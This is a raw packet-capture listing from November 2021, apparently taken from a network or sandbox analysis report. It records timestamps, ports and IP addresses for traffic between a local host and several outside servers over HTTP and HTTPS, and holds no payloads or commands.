                                                                                                                                                    Nov 29, 2021 14:10:39.969225883 CET804983634.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:39.969248056 CET804983634.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:39.969403982 CET804983634.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:39.969521999 CET804983634.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:39.969536066 CET804983634.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:39.969788074 CET804983634.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:39.969806910 CET804983634.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:39.969820023 CET804983634.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:39.970115900 CET804983634.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:39.974693060 CET804983634.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:40.043905020 CET804983734.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:40.043972969 CET804983734.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:40.044204950 CET4983780192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:10:40.044265032 CET4983780192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:10:40.055377007 CET804983734.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:40.095241070 CET804983634.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:40.095318079 CET804983634.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:40.095453024 CET4983680192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:10:40.095494032 CET4983680192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:10:50.232074976 CET4983880192.168.11.2081.2.194.128
                                                                                                                                                    Nov 29, 2021 14:10:50.258629084 CET804983881.2.194.128192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:50.258852959 CET4983880192.168.11.2081.2.194.128
                                                                                                                                                    Nov 29, 2021 14:10:50.261581898 CET4983880192.168.11.2081.2.194.128
                                                                                                                                                    Nov 29, 2021 14:10:50.261662006 CET4983880192.168.11.2081.2.194.128
                                                                                                                                                    Nov 29, 2021 14:10:50.261864901 CET4983980192.168.11.2081.2.194.128
                                                                                                                                                    Nov 29, 2021 14:10:50.288172960 CET804983881.2.194.128192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:50.288218021 CET804983881.2.194.128192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:50.288271904 CET804983881.2.194.128192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:50.288304090 CET804983881.2.194.128192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:50.288399935 CET4983880192.168.11.2081.2.194.128
                                                                                                                                                    Nov 29, 2021 14:10:50.288507938 CET804983881.2.194.128192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:50.288567066 CET804983881.2.194.128192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:50.288579941 CET4983880192.168.11.2081.2.194.128
                                                                                                                                                    Nov 29, 2021 14:10:50.288747072 CET4983880192.168.11.2081.2.194.128
                                                                                                                                                    Nov 29, 2021 14:10:50.288829088 CET804983881.2.194.128192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:50.288888931 CET804983881.2.194.128192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:50.288933039 CET4983880192.168.11.2081.2.194.128
                                                                                                                                                    Nov 29, 2021 14:10:50.288943052 CET804983881.2.194.128192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:50.288996935 CET804983881.2.194.128192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:50.289057016 CET804983981.2.194.128192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:50.289103031 CET4983880192.168.11.2081.2.194.128
                                                                                                                                                    Nov 29, 2021 14:10:50.289282084 CET4983980192.168.11.2081.2.194.128
                                                                                                                                                    Nov 29, 2021 14:10:50.289299965 CET4983880192.168.11.2081.2.194.128
                                                                                                                                                    Nov 29, 2021 14:10:50.289401054 CET4983980192.168.11.2081.2.194.128
                                                                                                                                                    Nov 29, 2021 14:10:50.315129995 CET804983881.2.194.128192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:50.315352917 CET804983881.2.194.128192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:50.315397978 CET4983880192.168.11.2081.2.194.128
                                                                                                                                                    Nov 29, 2021 14:10:50.315449953 CET804983881.2.194.128192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:50.315572977 CET4983880192.168.11.2081.2.194.128
                                                                                                                                                    Nov 29, 2021 14:10:50.315701008 CET4983880192.168.11.2081.2.194.128
                                                                                                                                                    Nov 29, 2021 14:10:50.315717936 CET804983881.2.194.128192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:50.315831900 CET804983881.2.194.128192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:50.315939903 CET4983880192.168.11.2081.2.194.128
                                                                                                                                                    Nov 29, 2021 14:10:50.315968990 CET804983881.2.194.128192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:50.316063881 CET804983881.2.194.128192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:50.316109896 CET4983880192.168.11.2081.2.194.128
                                                                                                                                                    Nov 29, 2021 14:10:50.316131115 CET804983881.2.194.128192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:50.316241980 CET804983881.2.194.128192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:50.316243887 CET4983880192.168.11.2081.2.194.128
                                                                                                                                                    Nov 29, 2021 14:10:50.316337109 CET804983881.2.194.128192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:50.316437960 CET804983881.2.194.128192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:50.316473961 CET4983880192.168.11.2081.2.194.128
                                                                                                                                                    Nov 29, 2021 14:10:50.316502094 CET804983881.2.194.128192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:50.316591024 CET4983880192.168.11.2081.2.194.128
                                                                                                                                                    Nov 29, 2021 14:10:50.316600084 CET804983881.2.194.128192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:50.316653967 CET804983881.2.194.128192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:50.316705942 CET804983881.2.194.128192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:50.316759109 CET804983881.2.194.128192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:50.316768885 CET4983880192.168.11.2081.2.194.128
                                                                                                                                                    Nov 29, 2021 14:10:50.316812992 CET804983881.2.194.128192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:50.316867113 CET804983881.2.194.128192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:50.316924095 CET804983881.2.194.128192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:50.316976070 CET804983881.2.194.128192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:50.317011118 CET4983880192.168.11.2081.2.194.128
                                                                                                                                                    Nov 29, 2021 14:10:50.317029953 CET804983981.2.194.128192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:50.317341089 CET4983880192.168.11.2081.2.194.128
                                                                                                                                                    Nov 29, 2021 14:10:50.342122078 CET804983881.2.194.128192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:50.342365026 CET4983880192.168.11.2081.2.194.128
                                                                                                                                                    Nov 29, 2021 14:10:50.343517065 CET804983881.2.194.128192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:50.343581915 CET804983881.2.194.128192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:50.343646049 CET804983881.2.194.128192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:50.343678951 CET804983881.2.194.128192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:50.343751907 CET4983880192.168.11.2081.2.194.128
                                                                                                                                                    Nov 29, 2021 14:10:50.343880892 CET4983880192.168.11.2081.2.194.128
                                                                                                                                                    Nov 29, 2021 14:10:50.344052076 CET804983881.2.194.128192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:50.344060898 CET4983880192.168.11.2081.2.194.128
                                                                                                                                                    Nov 29, 2021 14:10:50.344111919 CET804983881.2.194.128192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:50.344146013 CET804983881.2.194.128192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:50.344177008 CET804983881.2.194.128192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:50.344207048 CET804983881.2.194.128192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:50.344229937 CET4983880192.168.11.2081.2.194.128
                                                                                                                                                    Nov 29, 2021 14:10:50.344355106 CET804983881.2.194.128192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:50.344389915 CET804983881.2.194.128192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:50.344413996 CET4983880192.168.11.2081.2.194.128
                                                                                                                                                    Nov 29, 2021 14:10:50.344530106 CET804983881.2.194.128192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:50.344563007 CET804983881.2.194.128192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:50.344588041 CET4983880192.168.11.2081.2.194.128
                                                                                                                                                    Nov 29, 2021 14:10:50.344633102 CET804983881.2.194.128192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:50.344759941 CET4983880192.168.11.2081.2.194.128
                                                                                                                                                    Nov 29, 2021 14:10:50.344790936 CET804983881.2.194.128192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:50.344877958 CET804983881.2.194.128192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:50.344911098 CET804983881.2.194.128192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:50.344938993 CET4983880192.168.11.2081.2.194.128
                                                                                                                                                    Nov 29, 2021 14:10:50.345036030 CET804983881.2.194.128192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:50.345068932 CET804983881.2.194.128192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:50.384805918 CET804983881.2.194.128192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:50.795722008 CET4983980192.168.11.2081.2.194.128
                                                                                                                                                    Nov 29, 2021 14:10:50.862052917 CET804983981.2.194.128192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:51.376867056 CET804983881.2.194.128192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:51.376931906 CET804983881.2.194.128192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:51.377116919 CET4983880192.168.11.2081.2.194.128
                                                                                                                                                    Nov 29, 2021 14:10:51.377192974 CET4983880192.168.11.2081.2.194.128
                                                                                                                                                    Nov 29, 2021 14:10:51.388405085 CET804983981.2.194.128192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:51.388493061 CET804983981.2.194.128192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:51.388549089 CET804983981.2.194.128192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:51.388669968 CET4983980192.168.11.2081.2.194.128
                                                                                                                                                    Nov 29, 2021 14:10:51.388739109 CET4983980192.168.11.2081.2.194.128
                                                                                                                                                    Nov 29, 2021 14:10:51.388756037 CET4983980192.168.11.2081.2.194.128
                                                                                                                                                    Nov 29, 2021 14:11:00.914674997 CET4984080192.168.11.20172.67.201.232
                                                                                                                                                    Nov 29, 2021 14:11:00.923845053 CET8049840172.67.201.232192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:00.924052954 CET4984080192.168.11.20172.67.201.232
                                                                                                                                                    Nov 29, 2021 14:11:00.925525904 CET4984080192.168.11.20172.67.201.232
                                                                                                                                                    Nov 29, 2021 14:11:00.925601959 CET4984080192.168.11.20172.67.201.232
                                                                                                                                                    Nov 29, 2021 14:11:00.925743103 CET4984180192.168.11.20172.67.201.232
                                                                                                                                                    Nov 29, 2021 14:11:00.934706926 CET8049840172.67.201.232192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:00.934814930 CET8049840172.67.201.232192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:00.934926987 CET8049840172.67.201.232192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:00.934962988 CET8049840172.67.201.232192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:00.935058117 CET4984080192.168.11.20172.67.201.232
                                                                                                                                                    Nov 29, 2021 14:11:00.935184956 CET4984080192.168.11.20172.67.201.232
                                                                                                                                                    Nov 29, 2021 14:11:00.935256958 CET8049840172.67.201.232192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:00.935302019 CET8049840172.67.201.232192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:00.935334921 CET8049840172.67.201.232192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:00.935360909 CET4984080192.168.11.20172.67.201.232
                                                                                                                                                    Nov 29, 2021 14:11:00.935401917 CET8049840172.67.201.232192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:00.935436964 CET8049840172.67.201.232192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:00.935468912 CET8049840172.67.201.232192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:00.935507059 CET8049841172.67.201.232192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:00.935539007 CET4984080192.168.11.20172.67.201.232
                                                                                                                                                    Nov 29, 2021 14:11:00.935683012 CET4984180192.168.11.20172.67.201.232
                                                                                                                                                    Nov 29, 2021 14:11:00.935719013 CET4984080192.168.11.20172.67.201.232
                                                                                                                                                    Nov 29, 2021 14:11:00.935765028 CET4984180192.168.11.20172.67.201.232
                                                                                                                                                    Nov 29, 2021 14:11:00.944616079 CET8049840172.67.201.232192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:00.944683075 CET8049840172.67.201.232192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:00.944808960 CET4984080192.168.11.20172.67.201.232
                                                                                                                                                    Nov 29, 2021 14:11:00.944833994 CET8049840172.67.201.232192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:00.944925070 CET8049840172.67.201.232192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:00.944978952 CET4984080192.168.11.20172.67.201.232
                                                                                                                                                    Nov 29, 2021 14:11:00.944989920 CET8049840172.67.201.232192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:00.945065022 CET8049840172.67.201.232192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:00.945102930 CET8049840172.67.201.232192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:00.945183039 CET8049840172.67.201.232192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:00.945184946 CET4984080192.168.11.20172.67.201.232
                                                                                                                                                    Nov 29, 2021 14:11:00.945216894 CET8049840172.67.201.232192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:00.945274115 CET8049840172.67.201.232192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:00.945310116 CET8049840172.67.201.232192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:00.945360899 CET8049840172.67.201.232192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:00.945390940 CET4984080192.168.11.20172.67.201.232
                                                                                                                                                    Nov 29, 2021 14:11:00.945419073 CET8049840172.67.201.232192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:00.945451975 CET8049840172.67.201.232192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:00.945502043 CET8049840172.67.201.232192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:00.945512056 CET4984080192.168.11.20172.67.201.232
                                                                                                                                                    Nov 29, 2021 14:11:00.945533991 CET8049840172.67.201.232192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:00.945689917 CET4984080192.168.11.20172.67.201.232
                                                                                                                                                    Nov 29, 2021 14:11:00.945714951 CET8049840172.67.201.232192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:00.945817947 CET8049840172.67.201.232192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:00.945856094 CET8049841172.67.201.232192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:00.945873022 CET4984080192.168.11.20172.67.201.232
                                                                                                                                                    Nov 29, 2021 14:11:00.945900917 CET8049840172.67.201.232192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:00.945945978 CET8049840172.67.201.232192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:00.946094990 CET4984080192.168.11.20172.67.201.232
                                                                                                                                                    Nov 29, 2021 14:11:00.946266890 CET4984080192.168.11.20172.67.201.232
                                                                                                                                                    Nov 29, 2021 14:11:00.946439981 CET4984080192.168.11.20172.67.201.232
                                                                                                                                                    Nov 29, 2021 14:11:00.946572065 CET4984080192.168.11.20172.67.201.232
                                                                                                                                                    Nov 29, 2021 14:11:00.954632044 CET8049840172.67.201.232192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:00.954828978 CET4984080192.168.11.20172.67.201.232
                                                                                                                                                    Nov 29, 2021 14:11:00.955061913 CET8049840172.67.201.232192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:00.955121040 CET8049840172.67.201.232192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:00.955213070 CET4984080192.168.11.20172.67.201.232
                                                                                                                                                    Nov 29, 2021 14:11:00.955286980 CET8049840172.67.201.232192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:00.955322027 CET8049840172.67.201.232192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:00.955353975 CET8049840172.67.201.232192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:00.955388069 CET8049840172.67.201.232192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:00.955396891 CET4984080192.168.11.20172.67.201.232
                                                                                                                                                    Nov 29, 2021 14:11:00.955454111 CET8049840172.67.201.232192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:00.955571890 CET4984080192.168.11.20172.67.201.232
                                                                                                                                                    Nov 29, 2021 14:11:00.955641031 CET8049840172.67.201.232192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:00.955673933 CET8049840172.67.201.232192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:00.955740929 CET4984080192.168.11.20172.67.201.232
                                                                                                                                                    Nov 29, 2021 14:11:00.955782890 CET8049840172.67.201.232192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:00.955849886 CET8049840172.67.201.232192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:00.955923080 CET4984080192.168.11.20172.67.201.232
                                                                                                                                                    Nov 29, 2021 14:11:00.955986977 CET8049840172.67.201.232192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:00.956021070 CET8049840172.67.201.232192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:00.956053972 CET8049840172.67.201.232192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:00.956084013 CET8049840172.67.201.232192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:00.956098080 CET4984080192.168.11.20172.67.201.232
                                                                                                                                                    Nov 29, 2021 14:11:00.956203938 CET8049840172.67.201.232192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:00.956238031 CET8049840172.67.201.232192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:00.956271887 CET8049840172.67.201.232192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:00.956279993 CET4984080192.168.11.20172.67.201.232
                                                                                                                                                    Nov 29, 2021 14:11:00.956442118 CET8049840172.67.201.232192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:00.956481934 CET8049840172.67.201.232192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:00.956513882 CET8049840172.67.201.232192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:00.956545115 CET8049840172.67.201.232192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:00.956630945 CET8049840172.67.201.232192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:00.956717968 CET8049840172.67.201.232192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:00.956749916 CET8049840172.67.201.232192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:00.956780910 CET8049840172.67.201.232192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:00.956964970 CET8049840172.67.201.232192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:00.956999063 CET8049840172.67.201.232192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:00.957030058 CET8049840172.67.201.232192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:00.957062006 CET8049840172.67.201.232192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:00.957093954 CET8049840172.67.201.232192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:00.957226038 CET8049840172.67.201.232192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:00.957258940 CET8049840172.67.201.232192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:00.957293034 CET8049840172.67.201.232192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:00.957324028 CET8049840172.67.201.232192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:00.957355022 CET8049840172.67.201.232192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:00.957386017 CET8049840172.67.201.232192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:00.957472086 CET8049840172.67.201.232192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:00.957504034 CET8049840172.67.201.232192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:00.964045048 CET8049840172.67.201.232192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:00.964096069 CET8049840172.67.201.232192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:00.964440107 CET8049840172.67.201.232192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:00.964504957 CET8049840172.67.201.232192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:00.964615107 CET8049840172.67.201.232192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:00.964814901 CET8049840172.67.201.232192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:00.965085983 CET8049840172.67.201.232192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:00.965234995 CET8049840172.67.201.232192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:00.965318918 CET8049840172.67.201.232192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:00.965506077 CET8049840172.67.201.232192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:00.965701103 CET8049840172.67.201.232192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:00.965776920 CET8049840172.67.201.232192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:00.965914011 CET8049840172.67.201.232192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:00.965949059 CET8049840172.67.201.232192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:00.966156960 CET8049840172.67.201.232192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:00.966192961 CET8049840172.67.201.232192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:00.966406107 CET8049840172.67.201.232192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:00.966541052 CET8049840172.67.201.232192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:00.966664076 CET8049840172.67.201.232192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:00.966711998 CET8049840172.67.201.232192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:00.966783047 CET8049840172.67.201.232192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:00.966831923 CET8049840172.67.201.232192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:00.966881990 CET8049840172.67.201.232192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:00.966914892 CET8049840172.67.201.232192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:00.967154980 CET8049840172.67.201.232192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:00.967189074 CET8049840172.67.201.232192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:00.967314959 CET8049840172.67.201.232192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:00.967354059 CET8049840172.67.201.232192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:01.008554935 CET8049840172.67.201.232192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:01.106746912 CET8049841172.67.201.232192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:01.106873989 CET8049841172.67.201.232192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:01.106939077 CET8049841172.67.201.232192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:01.107064009 CET4984180192.168.11.20172.67.201.232
                                                                                                                                                    Nov 29, 2021 14:11:01.107144117 CET4984180192.168.11.20172.67.201.232
                                                                                                                                                    Nov 29, 2021 14:11:01.107162952 CET4984180192.168.11.20172.67.201.232
                                                                                                                                                    Nov 29, 2021 14:11:01.116120100 CET8049841172.67.201.232192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:01.116326094 CET4984180192.168.11.20172.67.201.232
                                                                                                                                                    Nov 29, 2021 14:11:01.255264997 CET8049840172.67.201.232192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:01.255346060 CET8049840172.67.201.232192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:01.255408049 CET8049840172.67.201.232192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:01.255573988 CET4984080192.168.11.20172.67.201.232
                                                                                                                                                    Nov 29, 2021 14:11:01.255631924 CET4984080192.168.11.20172.67.201.232
                                                                                                                                                    Nov 29, 2021 14:11:05.731422901 CET49842443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:05.731528044 CET4434984220.124.109.2192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:05.731719017 CET49842443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:05.764612913 CET49842443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:05.764621973 CET4434984220.124.109.2192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:05.957972050 CET4434984220.124.109.2192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:05.958201885 CET49842443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:05.967586040 CET49842443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:05.967623949 CET4434984220.124.109.2192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:05.968336105 CET4434984220.124.109.2192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:05.968488932 CET49842443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:05.970715046 CET49842443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:06.011980057 CET4434984220.124.109.2192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:06.121969938 CET4984380192.168.11.2066.29.140.185
                                                                                                                                                    Nov 29, 2021 14:11:06.141576052 CET4434984220.124.109.2192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:06.141668081 CET4434984220.124.109.2192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:06.141748905 CET49842443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:06.141791105 CET4434984220.124.109.2192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:06.141829014 CET49842443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:06.141855001 CET49842443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:06.141869068 CET49842443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:06.141891956 CET49842443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:06.141944885 CET49842443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:06.141957998 CET49842443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:06.235174894 CET4434984220.124.109.2192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:06.235383034 CET49842443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:06.235420942 CET49842443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:06.235439062 CET49842443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:06.235758066 CET4434984220.124.109.2192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:06.235956907 CET49842443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:06.235990047 CET49842443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:06.236005068 CET49842443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:06.236277103 CET4434984220.124.109.2192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:06.236583948 CET49842443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:06.292529106 CET804984366.29.140.185192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:06.293114901 CET4984380192.168.11.2066.29.140.185
                                                                                                                                                    Nov 29, 2021 14:11:06.294732094 CET4984380192.168.11.2066.29.140.185
